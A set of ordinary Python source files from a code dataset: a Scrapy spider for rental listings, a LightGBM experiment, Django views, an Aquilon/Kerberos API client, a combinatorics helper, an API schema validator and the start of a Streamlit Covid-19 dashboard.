'''\n self.logger.info(f\"crawled 详情页:{response.url}\")\n url_parsed = urlparse(response.url)\n\n # 检测是否正常页面\n room_id = response.xpath('//input[@id=\"room_id\"]/@value').extract_first()\n house_id = response.xpath('//input[@id=\"house_id\"]/@value').extract_first()\n resblock_id = response.xpath('//input[@id=\"resblock_id\"]/@value').extract_first()\n if not(room_id and house_id and resblock_id):\n self.log_200_abnormal(\n response, \n position='抓取:详情页', \n statement=f\"room_id:{room_id} - house_id:{house_id} - resblock_id:{resblock_id}\", \n close=False\n )\n return\n\n # 主信息\n item = copy.deepcopy(response.meta['item'])\n item['room_link'] = copy.copy(response.url)\n item['district'] = response.xpath('//span[@class=\"ellipsis\"]/text()')\\\n .re(r'\\[?(\\S+)\\s+(\\S+)\\]?')\n item['house_id'] = int(house_id)\n item['room_sn'] = response.xpath('//h3[@class=\"fb\"]/text()').re_first(r'\\S+')\n item['room_introduce'] = response.xpath('//p/strong[text()=\"房源介绍:\"]\\\n /parent::node()/text()').extract_first()\n item['community'] = response.xpath('//div[@class=\"node_infor area\"]/\\\n a[last()]/text()').re_first('(.+)租房信息')\n detail_room = response.xpath('//ul[@class=\"detail_room\"]')\n item['subway'] = detail_room.xpath('li[contains(text(), \"交通:\")]/span/text() | \\\n li[contains(text(), \"交通:\")]/span/span/p/text()').re(r'距[\\s\\S+]+米')\n item['rent_type'] = detail_room.xpath('//span[@class=\"icons\"]/text()').extract_first()\n item['area'] = detail_room.xpath('li[contains(text(), \"面积:\")]/text()')\\\n .re_first(r'面积:\\s*(\\S+)\\s+')\n item['floor'] = detail_room.xpath('li[contains(text(), \"楼层:\")]/text()')\\\n .re(r'楼层:\\s*(\\d+)/(\\d+)层')\n item['towards'] = detail_room.xpath('li[contains(text(), \"朝向:\")]/text()')\\\n .re_first(r'朝向:\\s*(\\S+)\\s*')\n item['house_type'] = detail_room.xpath('li[contains(text(), \"户型:\")]/text()')\\\n .re(r'户型:\\s*(\\d+)室(?:(\\d+)厅)?')\n item['rent_status'] = response.xpath('//a[@id=\"zreserve\"]/text()').extract_first()\n img_sel = response.xpath('//div[@id=\"lofslidecontent45\"]//\\\n ul[@class=\"lof-main-wapper\"]/li/a/img')\n if img_sel:\n item['photos'] = []\n for img in img_sel:\n tmp_src = img.xpath('@src').extract_first()\n if tmp_src.find('http:') == -1:\n tmp_src = url_parsed.scheme + '://' + tmp_src.strip('//').strip('/')\n img_info = {\n 'path': None,\n 'thumb_path': None,\n 'title': img.xpath('@title').extract_first(),\n 'origin_src': tmp_src.replace('v180x135', 'v800x600'),\n }\n item['photos'].append(img_info)\n item['map_position'] = response.xpath('//input[@id=\"mapsearchText\"]/\\\n @data-lng | //input[@id=\"mapsearchText\"]/@data-lat').extract()\n roommates_sel = response.xpath('//div[@class=\"greatRoommate\"]/ul/li/div')\n if roommates_sel:\n item['roommates'] = []\n for mate_sel in roommates_sel:\n mate = {}\n mate['gender'] = mate_sel.xpath('parent::node()/@class').re_first(r'\\S+')\n mate['room'] = mate_sel.xpath('div[@class=\"user_top clearfix\"]/\\\n p/text()').extract_first()\n mate['status'] = mate_sel.xpath('div[@class=\"user_top clearfix\"]/\\\n span[@class=\"tags\"]/text()').extract_first()\n mate['sign'] = mate_sel.xpath('div[@class=\"user_center\"]/p[1]/\\\n text()').extract_first()\n mate['jobs'] = mate_sel.xpath('div[@class=\"user_center\"]/p[2]/\\\n span[1]/text()').extract_first()\n mate['check_in_time'] = mate_sel.xpath('div[@class=\"user_bottom\"]/\\\n p/text()').re_first(r'\\S+')\n item['roommates'].append(mate)\n yield item\n\n # 继续抓取管家、房间配置、支付详情、空气\n http_prfix = url_parsed.scheme + '://' + url_parsed.netloc\n 
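All of the AJAX endpoint URLs assembled next are rebuilt from the scheme/netloc split that urllib.parse provides; a standalone illustration of that split (example URL only):

from urllib.parse import urlparse

u = urlparse("http://sh.ziroom.com/z/vr/61230316.html?p=2")
print(u.scheme)                      # 'http'
print(u.netloc)                      # 'sh.ziroom.com'
print(u.scheme + "://" + u.netloc)   # base used to compose the detail endpoints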
keeper_url = http_prfix + f\"/detail/steward?resblock_id={resblock_id}\"\\\n f\"&room_id={room_id}&house_id={house_id}&ly_name=&ly_phone=\"\n payment_and_air_url = http_prfix + f\"/detail/info?id={room_id}&house_id={house_id}\"\n allocation_url = http_prfix + f\"/detail/config?house_id={house_id}&id={room_id}\"\n yield scrapy.Request(\n keeper_url, \n meta={'referer': copy.copy(response.url), 'room_id':int(room_id)}, \n callback=self.parse_keeper\n )\n yield scrapy.Request(\n payment_and_air_url, \n meta={'referer': copy.copy(response.url), 'room_id':int(room_id)}, \n callback=self.parse_payment_air\n )\n yield scrapy.Request(\n allocation_url, \n meta={'referer': copy.copy(response.url), 'room_id':int(room_id)}, \n callback=self.parse_allocation\n )\n\n def parse_keeper(self, response):\n '''管家信息'''\n self.logger.info(f\"crawled 管家信息:{response.url}\")\n try:\n body = response.body.decode()\n body_dict = json.loads(body)\n if body_dict['code'] == 200 and body_dict['message'] == 'success':\n data = body_dict['data']\n item = ZiroomItem()\n item['room_id'] = copy.copy(response.meta['room_id'])\n item['keeper'] = {\n 'keeper_id': int(data['keeperId']),\n 'keeper_name': data['keeperName'],\n 'keeper_phone': data['keeperPhone'],\n 'keeper_header': {\n 'path': None,\n 'origin_src': data['headCorn'],\n 'referer': copy.copy(response.meta['referer']),\n },\n }\n yield item\n else:\n raise UserWarning(f\"管家信息: body_dict['code'] != 200\")\n except Exception as e:\n self.log_200_abnormal(response, position='抓取:管家信息', statement=e, close=False)\n\n def parse_payment_air(self, response):\n '''付款详细信息 && 空气质量'''\n self.logger.info(f\"crawled 付款+空气:{response.url}\")\n try:\n body = response.body.decode()\n body_dict = json.loads(body)\n if body_dict['code'] == 200 and body_dict['message'] == 'success':\n data = body_dict['data']\n item = ZiroomItem()\n item['room_id'] = copy.copy(response.meta['room_id'])\n if 'payment' in data and len(data['payment']):\n url_parsed = urlparse(response.url)\n item['payment'] = {\n 'png': {\n 'origin_src': url_parsed.scheme + ':' + data['payment'][0]['rent'][1], \n 'referer': copy.copy(response.url), \n 'path': None\n },\n 'info': []\n }\n for x in data['payment']:\n pay_tmp = {\n 'period': x['period'],\n 'rent': {'price': None, 'position': x['rent'][2]},\n 'deposit': {'price': None, 'position': x['deposit'][2]},\n 'service_charge': {'price': None, 'position': x['service_charge'][2]},\n }\n item['payment']['info'].append(pay_tmp)\n else:\n item['payment'] = None\n if 'air_part' in data and 'air_quality' in data['air_part']:\n item['air'] = {\n 'result_list': data['air_part']['air_quality'].get('result_list'),\n 'show_info': data['air_part']['air_quality'].get('show_info')\n }\n else:\n item['air'] = None\n item['video_src'] = data.get('vr_video', {}).get('video_url')\n yield item\n else:\n raise UserWarning(f\"付款详细信息: body_dict['code'] != 200\")\n except Exception as e:\n self.log_200_abnormal(response, position='抓取:付款详细信息', statement=e, close=False)\n\n def parse_allocation(self, response):\n '''房屋配置'''\n self.logger.info(f\"crawled 房屋配置:{response.url}\")\n try:\n body = response.body.decode()\n body_dict = json.loads(body)\n if body_dict['code'] == 200 and body_dict['message'] == 'success':\n data = body_dict['data']\n item = ZiroomItem()\n item['room_id'] = copy.copy(response.meta['room_id'])\n item['allocation'] = data\n yield item\n else:\n raise UserWarning(f\"房屋配置: body_dict['code'] != 200\")\n except Exception as e:\n self.log_200_abnormal(response, 
position='抓取:房屋配置', statement=e, close=False)\n\n def log_200_abnormal(self, response, *, position='未知', statement='', close=True):\n ''''记录疑似非正常页面:response.status_code==200,但是返回的页面内容貌似不是我们想要的内容'''\n self.logger.critical(f\"发现疑似非正常页面\")\n self.logger.critical(f\"url : {response.url}\")\n self.logger.critical(f\"position : {position}\")\n self.logger.critical(f\"statement : {statement}\")\n self.logger.critical(f\"response.body : {response.body.decode()}\")\n if close:\n raise CloseSpider(f\"发现疑似非正常页面\")\n","sub_path":"ziroom/spiders/ziroom.py","file_name":"ziroom.py","file_ext":"py","file_size_in_byte":17117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258852269","text":"from sacred import Ingredient\ndata_ingredient = Ingredient('data')\nfeature_ingredient = Ingredient('feature')\ntrain_ingredient = Ingredient('train')\n\n# My imports\nfrom lightgbm import LGBMRegressor\nfrom src.models.experiments.functions import *\nfrom src.features.transformers import *\nfrom src.models.functions import *\nfrom src.models.experiments.train_model import *\nfrom src.features.feature_selection import FeatureSelector\nfrom src.data.extracts import irregular_cols, cts_cols\nfrom src.models.optimizers import old_params\n\n\n# Feature Generation\n@feature_ingredient.config\ndef feature_config():\n # Use RFECV feature selection\n feature_selction = False\n\n # Num measurements in the last n_hours\n num_measurements = False\n\n # Moments\n moments = False\n moment_lookback = 6\n\n # Signature options\n columns = False\n lookback = False\n lookback_method = 'mean'\n individual = False\n order, logsig, leadlag, addtime, cumsum, pen_off, append_zero = 2, True, False, False, False, False, False\n\n # Cumsum signatures\n cumsum_columns = False\n cumsum_addtime = False\n cumsum_lookback = 10\n cumsum_order = 3\n\n # Other\n extra_moments = False\n add_max, add_min = False, False\n max_min_lookback = 5\n drop_count = False\n\n # For submission\n last_only = False\n\n@feature_ingredient.capture\ndef generate_features(_run, feature_selection,\n num_measurements, moments, moment_lookback,\n columns, lookback, lookback_method, individual, order, logsig, leadlag, addtime, cumsum, pen_off, append_zero,\n extra_moments, add_max, add_min, max_min_lookback, drop_count,\n last_only):\n # Get data\n df, labels_binary, labels_utility = load_munged_data()\n df.drop('hospital', axis=1, inplace=True)\n\n # Get number of measurements taken in a fixed time window\n counts_24hrs = None\n if num_measurements is not False:\n cols = [x for x in df.columns if '_count' in x]\n counts_24hrs = GetNumMeasurements(lookback=num_measurements).transform(df[cols])\n counts_24hrs = numpy_to_named_dataframe(counts_24hrs, df.index, 'cntxhrs')\n\n # Moments\n moments_frame = None\n if moments is not False:\n moments_frame = AddMoments(moments=moments, lookback=moment_lookback, last_only=last_only).transform(df)\n moments_frame = numpy_to_named_dataframe(moments_frame, df.index, 'Moments')\n moments_frame.columns = ['{}_moment_{}'.format(col, i) for i in range(2, moments + 1) for col in df.columns]\n\n # Add signatures\n signatures = None\n if columns is not False:\n signatures = add_signatures(df, columns, individual, lookback, lookback_method,\n order, logsig, leadlag, addtime, cumsum, pen_off, append_zero, last_only=last_only)\n signatures = numpy_to_named_dataframe(signatures, df.index, 'Signatures')\n\n # Get sampling rate rather than absolute number for the count column.\n data = 
GetRateOfLaboratorySampling().transform(df)\n\n # Get extra moments\n new_moments = None\n if extra_moments is not False:\n cols = ['HCO3', 'HR']\n new_moments = AddMoments(moments=extra_moments, start=4, force_compute=True).transform(df[cols])\n new_moments = pd.DataFrame(index=df.index, data=new_moments)\n new_moments.columns = ['{}_moment_{}'.format(col, i) for i in range(4, extra_moments + 1) for col in cols]\n\n # Max and min\n max_vals = None\n if add_max is not False:\n max_vals = GetStatistic(statistic='max', lookback=max_min_lookback, columns=cts_cols).transform(df[cts_cols])\n max_vals = pd.DataFrame(index=df.index, data=max_vals, columns=['{}_max'.format(x) for x in cts_cols])\n\n min_vals = None\n if add_min is not False:\n min_vals = GetStatistic(statistic='min', lookback=max_min_lookback, columns=cts_cols).transform(df[cts_cols])\n min_vals = pd.DataFrame(index=df.index, data=min_vals, columns=['{}_min'.format(x) for x in cts_cols])\n\n # Create data ready for insertion\n # df.drop([x for x in df.columns if '_count' in x], axis=1, inplace=True)\n df = pd.concat([data, counts_24hrs, moments_frame, signatures, new_moments, max_vals, min_vals], axis=1)\n # data = np.concatenate([x for x in (data, counts_24hrs, moments_frame, signatures) if x is not None], axis=1)\n # df = pd.DataFrame(index=df.index, data=data)\n # df = remove_useless_columns(df)\n\n # Try RFECV\n if feature_selection is not False:\n if feature_selection == 'from_save':\n features = load_pickle(MODELS_DIR + '/feature_selection/rfecv_test.pickle')\n df = df[[x for x in features if x in df.columns]]\n else:\n fs = FeatureSelector(verbose=1).fit(df, labels_utility)\n df = fs.transform(df)\n\n # Drop the count col\n if drop_count:\n df.drop([x for x in df.columns if '_count' in x], axis=1, inplace=True)\n\n # Print info about the shape\n print(df.shape)\n print(df.columns)\n\n # Add to run\n _run.df, _run.labels_binary, _run.labels_utility = df, labels_binary, labels_utility\n\n # Save for checking solution runs\n save_pickle(df, DATA_DIR + '/processed/dataframes/df_full.pickle')\n\n # For training early time\n # df = df[df.columns[0:40]]\n # print('THIS IS THE ACTUAL SHAPE', df.shape)\n\n return df\n\n# TRAIN\n@train_ingredient.config\ndef train_config():\n gs_params = False\n n_estimators = 100\n learning_rate = 0.1\n\n@train_ingredient.capture\ndef train_model(_run, gs_params, n_estimators, learning_rate):\n # Load\n df, labels_binary, labels_utility = _run.df, _run.labels_binary, _run.labels_utility\n\n # Get the cross validated folds\n cv_iter = CustomStratifiedGroupKFold(n_splits=5).split(df, labels_binary, groups=df.index.get_level_values('id'))\n\n # Setup the training loop function\n if gs_params is not False:\n params = load_pickle(MODELS_DIR + '/parameters/lgb/random_grid_fullds.pickle')\n # params = load_pickle(MODELS_DIR + '/parameters/lgb/random_grid.pickle')\n print(params)\n clf = LGBMRegressor(n_estimators=n_estimators, learning_rate=learning_rate).set_params(**params)\n else:\n clf = LGBMRegressor(**old_params).set_params(**{'n_estimators': n_estimators, 'learning_rate': learning_rate})\n predictions = cross_val_predict_to_series(clf, df, labels_utility, cv=cv_iter, n_jobs=-1)\n\n # Perform thresholding\n binary_preds, scores, _ = ThresholdOptimizer(budget=100, labels=labels_binary, preds=predictions).cross_val_threshold(cv_iter, parallel=True, give_cv_num=True)\n\n # Log info\n ppprint('AVERAGE SCORE {:.3f}'.format(np.mean(scores)), color='green')\n _run.log_scalar('utility_score', 
np.mean(scores))\n save_pickle(predictions, _run.save_dir + '/probas.pickle')\n\n","sub_path":"CanIgetyoursignature/physionet_submission_6/src/models/experiments/ingredients.py","file_name":"ingredients.py","file_ext":"py","file_size_in_byte":6768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"641866240","text":"#!/usr/bin/env python3\n# coding=UTF-8\nimport simplejson\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.template.loader import get_template\n\nfrom Server import Server, API, LogSys\n\n\ndef result_uiauto_details(request):\n '''\n 用于判断编辑条件\n :param request:\n :return:\n '''\n LogSys.logInfo('Request:{0}'.format(request))\n key = 0\n if request.GET['user'] == 'visitor':\n key = 0\n elif request.GET['user'] == 'admin':\n key = 1\n detail = API.api_auto_detail(request)\n detail_dict = simplejson.loads(detail)\n reason = Server.getRealReason(request)\n if detail_dict['code'] != 0:\n context = {'person': None}\n else:\n context = {'person': detail_dict, 'reason': simplejson.loads(reason), 'key': key}\n LogSys.logInfo('Result:{0}'.format(context))\n return render(request, 'uiAutoDetail.html', context)\n\ndef result_uiauto_list(request):\n '''\n 用于判断编辑条件\n :param request:\n :return:\n '''\n LogSys.logInfo('Request:{0}'.format(request))\n listRun = API.api_auto_list(request)\n listRun_dict = simplejson.loads(listRun)\n if listRun_dict['code'] != 0:\n context = {'person': None}\n else:\n context = {'person': listRun_dict}\n LogSys.logInfo('Result:{0}'.format(context))\n return render(request, 'uiAutoList.html', context)\n\ndef result_apicheck_list(request):\n '''\n :param request:\n :return:\n '''\n LogSys.logInfo('API:web/result/api/monitor')\n LogSys.logInfo('Request:{0}'.format(request))\n listRun = API.api_server_list(request)\n listRun_dict = simplejson.loads(listRun)\n if listRun_dict['code'] != 0:\n context = {'person': None}\n else:\n context = {'person': listRun_dict}\n LogSys.logInfo('Result:{0}'.format(context))\n return render(request, 'apiMonitor.html', context)\n\ndef result_api_detail(request):\n '''\n :param request:\n :return:\n '''\n LogSys.logInfo('API:web/result/api/detail')\n LogSys.logInfo('Request:{0}'.format(request))\n listRun = API.api_server_detail(request)\n listRun_dict = simplejson.loads(listRun)\n if listRun_dict['code'] != 0:\n context = {'person': None}\n else:\n context = {'person': listRun_dict}\n LogSys.logInfo('Result:{0}'.format(context))\n return render(request, 'APIDetail.html', context)","sub_path":"Web/routehtml.py","file_name":"routehtml.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"51365464","text":"import logging\nimport requests\nimport common\nimport subprocess\n\nfrom requests.packages.urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nfrom requests_kerberos import HTTPKerberosAuth\n\n\nMAKE_SUFFIX = \"/host/{0}/command/make\"\nMANAGE_SUFFIX = \"/host/{0}/command/manage?hostname={0}&{1}={2}&force=true\"\n\nlogger = logging.getLogger(__name__)\n\n\ndef verify_kerberos_ticket():\n logger.info(\"Checking for valid Kerberos Ticket\")\n\n if subprocess.call(['klist', '-s']) == 1:\n logger.warn(\"No ticket found / expired. 
Obtaining new one\")\n        kinit_cmd = ['kinit', '-k']\n\n        if common.config.get(\"kerberos\", \"suffix\") != \"\":\n            kinit_cmd.append(common.config.get(\"kerberos\", \"suffix\"))\n\n        subprocess.call(kinit_cmd)\n\n        if subprocess.call(['klist', '-s']) == 1:\n            raise Exception(\"Failed to obtain valid Kerberos ticket\")\n\n    logger.info(\"Kerberos ticket success\")\n    return True\n\n\ndef aq_make(hostname, personality=None, osversion=None, archetype=None, osname=None):\n    logger.info(\"Attempting to make templates for \" + hostname)\n\n    # strip out blank parameters and hostname\n    params = {k: v for k, v in locals().items() if v is not None and k != \"hostname\"}\n\n    # join remaining parameters to form url string\n    params = [k + \"=\" + v for k, v in params.items()]\n\n    url = common.config.get(\"aquilon\", \"url\") + MAKE_SUFFIX.format(hostname) + \"?\" + \"&\".join(params)\n\n    verify_kerberos_ticket()\n\n    s = requests.Session()\n    s.verify = \"/etc/grid-security/certificates/\"\n    retries = Retry(total=5, backoff_factor=0.1, status_forcelist=[503])\n    s.mount('https://', HTTPAdapter(max_retries=retries))\n\n    response = s.post(url, auth=HTTPKerberosAuth())\n\n    if response.status_code != 200:\n        logger.error(\"Aquilon make failed: \" + str(response.text))\n        logger.error(url)\n        raise Exception(\"Aquilon make failed\")\n\n    logger.info(\"Successfully made templates\")\n\n\ndef aq_manage(hostname, env_type, env_name):\n    logger.info(\"Attempting to manage %s to %s %s\" % (hostname, env_type, env_name))\n\n    url = common.config.get(\"aquilon\", \"url\") + MANAGE_SUFFIX.format(hostname, env_type, env_name)\n\n    verify_kerberos_ticket()\n\n    s = requests.Session()\n    s.verify = \"/etc/grid-security/certificates/\"\n    retries = Retry(total=5, backoff_factor=0.1, status_forcelist=[503])\n    s.mount('https://', HTTPAdapter(max_retries=retries))\n\n    response = s.post(url, auth=HTTPKerberosAuth())\n\n    if response.status_code != 200:\n        logger.error(\"Aquilon manage failed: \" + str(response.text))\n        logger.error(url)\n        raise Exception(\"Aquilon manage failed\")\n\n    logger.info(\"Successfully managed machine\")\n\n\ndef vm_create(hostname, domain=None, sandbox=None, personality=None, osversion=None, archetype=None, osname=None):\n    if domain:\n        aq_manage(hostname, \"domain\", domain)\n    else:\n        aq_manage(hostname, \"sandbox\", sandbox)\n\n    aq_make(hostname, personality, osversion, archetype, osname)\n\n\ndef vm_delete(hostname):\n    # manage the host back to prod\n    aq_manage(hostname, \"domain\", \"prod\")\n\n    # reset personality etc ...\n    aq_make(hostname, \"nubesvms\", \"6x-x86_64\", \"ral-tier1\", \"sl\")\n\n","sub_path":"OpenStack-Rabbit-Consumer/usr/local/bin/aq_api.py","file_name":"aq_api.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
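The session-with-retries pattern both aq_* functions repeat is worth isolating. A minimal sketch, with the retry parameters and the urllib3 import path copied from the module above and an example URL standing in for the Aquilon endpoint:

import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry

s = requests.Session()
retries = Retry(total=5, backoff_factor=0.1, status_forcelist=[503])
s.mount("https://", HTTPAdapter(max_retries=retries))

# Every request through this session now retries 503s with exponential backoff.
resp = s.get("https://example.com/health")
print(resp.status_code)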
+{"seq_id":"71864688","text":"import sys\r\n\r\ndef ncr(n, r):\r\n    \"\"\"\r\n    Computes the number of possible unordered samples,\r\n    without replacement, of r individuals drawn\r\n    from a population of n individuals\r\n    \"\"\"\r\n    if r == 0 and n == 0:\r\n        return 1\r\n\r\n    if n == 0 and r != 0:\r\n        return 0\r\n\r\n\r\n    T = 1\r\n    N = 1\r\n    try:\r\n        for k in range(r):\r\n            T = T*(n - k)\r\n            N = N*(k + 1)\r\n        # exact integer division: N = r! always divides T = n(n-1)...(n-r+1)\r\n        return T//N\r\n    except OverflowError:\r\n        print(\" \")\r\n        print(\" \")\r\n        print(\"Overflow! The function ncr in kombinatorikk \"+ \\\r\n              \"cannot handle such large input n and r\")\r\n        print(\"Please try some smaller input\")\r\n        print(\" \")\r\n        raise\r\n\r\ndef npr(n, r):\r\n    \"\"\"\r\n    Computes the number of possible ordered samples,\r\n    without replacement, of r individuals drawn\r\n    from a population of n individuals\r\n    \"\"\"\r\n    P = 1\r\n    for k in range(r):\r\n        P = P*(n - k)\r\n    return P\r\n    \r\n\r\nif __name__ == \"__main__\":\r\n\r\n    \r\n    assert ncr(0, 0) == 1\r\n    assert ncr(1, 0) == 1\r\n    assert ncr(0, 1) == 0\r\n    assert ncr(1, 1) == 1\r\n\r\n    assert npr(5, 4) == 5*4*3*2\r\n    assert npr(10, 5) == 10*9*8*7*6\r\n    assert npr(1200, 3) == 1200*1199*1198\r\n\r\n    \r\n    for i in range(1, 1000):\r\n        try:\r\n            assert ncr(i, 1) == i\r\n        except AssertionError:\r\n            print(f\"error: got ncr({i}, 1) = {ncr(i, 1)}\")\r\n        \r\n        try:\r\n            k = i + 1\r\n            assert ncr(k, 2) == i*(i + 1)//2\r\n        except AssertionError:\r\n            print('got an error!')\r\n            sys.exit(0)\r\n\r\n    \r\n    for i in range(int(1E10), int(1.00001E10)):\r\n        try:\r\n            assert ncr(i, 1) == i\r\n        except AssertionError:\r\n            print(f\"error: got ncr({i}, 1) = {ncr(i, 1)}\")\r\n        \r\n        try:\r\n            k = i + 1\r\n            assert ncr(k, 2) == i*(i + 1)//2\r\n        except AssertionError:\r\n            print('got an error!')\r\n            sys.exit(0)\r\n\r\n    # with exact integer arithmetic this no longer overflows for large n and r\r\n    print(\"%g\" % ncr(int(7.5E9), 35))\r\n\r\n\r\n    for k in range(19):\r\n        # print some rows in pascals triangle\r\n        for i in range(k + 1):\r\n            print(ncr(k, i), end=' ')\r\n        print(\" \")\r\n\r\n\r\n","sub_path":"programmer/sammensatte_programmer/sannsynlighet/kombinatorikk.py","file_name":"kombinatorikk.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"316039939","text":"import os\nimport json\nimport random\n\nfrom billy import db\nfrom billy.commands import BaseCommand\nfrom billy.conf import settings\n\nfrom billy.commands.dump import APIValidator, api_url\n\nimport scrapelib\nimport validictory\n\n\nclass ValidateApi(BaseCommand):\n    name = 'validateapi'\n    help = 'validate data from the API'\n\n    def add_args(self):\n        self.add_argument('--apikey', dest='API_KEY',\n                          help='the API key to use')\n        self.add_argument('--schema_dir', default=None,\n                          help='directory to use for API schemas (optional)')\n\n    def handle(self, args):\n        for meta in db.metadata.find():\n            validate_api(meta['abbreviation'], args.schema_dir)\n\n\ndef get_json_schema(name, schema_dir):\n    if schema_dir:\n        try:\n            schema_dir = os.path.abspath(schema_dir)\n            with open(os.path.join(schema_dir, name + \".json\")) as f:\n                return json.load(f)\n        except IOError as ex:\n            if ex.errno != 2:\n                raise\n\n    # Fallback to default schema dir\n    cwd = os.path.split(__file__)[0]\n    default_schema_dir = os.path.join(cwd, \"../schemas/api/\")\n\n    with open(os.path.join(default_schema_dir, name + \".json\")) as f:\n        return json.load(f)\n\n\ndef validate_api(abbr, schema_dir=None):\n    metadata_schema = get_json_schema(\"metadata\", schema_dir)\n    path = \"metadata/%s\" % abbr\n    url = api_url(path)\n    json_response = scrapelib.urlopen(url)\n    validictory.validate(json.loads(json_response), metadata_schema,\n                         validator_cls=APIValidator)\n\n    bill_schema = get_json_schema(\"bill\", schema_dir)\n\n    spec = {settings.LEVEL_FIELD: abbr}\n    total_bills = db.bills.find(spec).count()\n\n    for i in xrange(0, 100):\n        bill = db.bills.find(spec)[random.randint(0, total_bills - 1)]\n        path = \"bills/%s/%s/%s/%s\" % (abbr, 
bill['session'],\n bill['chamber'], bill['bill_id'])\n url = api_url(path)\n\n json_response = scrapelib.urlopen(url)\n validictory.validate(json.loads(json_response), bill_schema,\n validator_cls=APIValidator)\n\n legislator_schema = get_json_schema(\"legislator\", schema_dir)\n for legislator in db.legislators.find(spec):\n path = 'legislators/%s' % legislator['_id']\n url = api_url(path)\n\n json_response = scrapelib.urlopen(url)\n validictory.validate(json.loads(json_response), legislator_schema,\n validator_cls=APIValidator)\n\n committee_schema = get_json_schema(\"committee\", schema_dir)\n for committee in db.committees.find(spec):\n path = \"committees/%s\" % committee['_id']\n url = api_url(path)\n\n json_response = scrapelib.urlopen(url)\n validictory.validate(json.loads(json_response), committee_schema,\n validator_cls=APIValidator)\n\n event_schema = get_json_schema(\"event\", schema_dir)\n total_events = db.events.find(spec).count()\n\n if total_events:\n for i in xrange(0, 10):\n event = db.events.find(spec)[random.randint(0, total_events - 1)]\n path = \"events/%s\" % event['_id']\n url = api_url(path)\n\n json_response = scrapelib.urlopen(url)\n validictory.validate(json.loads(json_response), event_schema,\n validator_cls=APIValidator)\n","sub_path":"billy/commands/validate_api.py","file_name":"validate_api.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"266322038","text":"import pandas as pd\n# import altair as alt\nimport streamlit as st\nfrom PIL import Image\n# import numpy as np\n# import matplotlib.pyplot as plt\nimport datetime\n# import seaborn as sns\n\nimage = Image.open('covid19.png')\nst.image(image, use_column_width=True)\n\n# @st.cache(allow_output_mutation=True)\ndef data_loader():\n url = 'https://toyokeizai.net/sp/visual/tko/covid19/csv/prefectures.csv'\n df = pd.read_csv(url)\n return df\n\nst.title('Japanese Covid-19 Dashboard')\n\n#データの整形\ndef to_date(d):\n # '{.formatの添え字:指定したい書式の型}' 02は最小幅は二桁という意味\n return pd.to_datetime('{0:02}/{1:02}/{2:02}'.format(d['year'], d['month'], d['date']), format='%Y/%m/%d')\n\ndef data_visualize():\n try:\n df = data_loader()\n # 日付に直す\n df['days'] = df.apply(to_date, axis=1)\n # Null値の補完\n df = df.fillna(0)\n\n # 型変換\n df['deaths'] = df['deaths'].astype(int)\n df['serious'] = df['serious'].astype(int)\n df['peopleTested'] = df['peopleTested'].astype(int)\n df['hospitalized'] = df['hospitalized'].astype(int)\n df['discharged'] = df['discharged'].astype(int)\n\n #カラム名の変更\n df = df.rename(columns={'days':'年月日', 'prefectureNameJ': '都道府県', 'peopleTested': '検査数','testedPositive':'陽性者数','discharged':'回復者数',\\\n 'hospitalized':'療養者数','serious':'重症者数','deaths':'死者数'})\n # 必要なカラムのみに絞る\n df = df[['年月日', '都道府県', '検査数', '陽性者数', '回復者数', '療養者数', '重症者数', '死者数']]\n\n _df = df.groupby('都道府県').max().sort_values('陽性者数',ascending=False)\n\n st.header('都道府県別の累計')\n st.dataframe(_df)\n st.bar_chart(_df['陽性者数'])\n\n st.header('全国陽性者数グラフ/日')\n df_days_all = df.loc[:, [\"年月日\", \"都道府県\", '陽性者数']]\n df_days_all = df_days_all.loc[:, [\"年月日\", \"都道府県\", '陽性者数']]\n df_days_all = df_days_all.set_index(\"年月日\")\n df_days_all = df_days_all.groupby('年月日').sum()\n df_days_all['陽性者数/日'] = df_days_all[\"陽性者数\"].diff()\n st.bar_chart(df_days_all['陽性者数/日'])\n\n #都道府県インプット\n _prefectureNameJ = st.sidebar.text_input(\"都道府県を入力してください\", \"東京都\")\n\n st.header(f'{_prefectureNameJ}・陽性者数グラフ/日')\n df_prefecture = df.groupby('都道府県').get_group(_prefectureNameJ)\n 
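All of the per-day bar charts in this dashboard are produced by differencing a cumulative series; a toy illustration of that step, with made-up numbers:

import pandas as pd

cum = pd.Series([10, 15, 15, 22], index=pd.date_range("2021-08-01", periods=4))
daily = cum.diff()   # first entry is NaN: there is no previous day to subtract
print(daily)

The NaN on the first day is expected; the chart libraries simply skip it.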
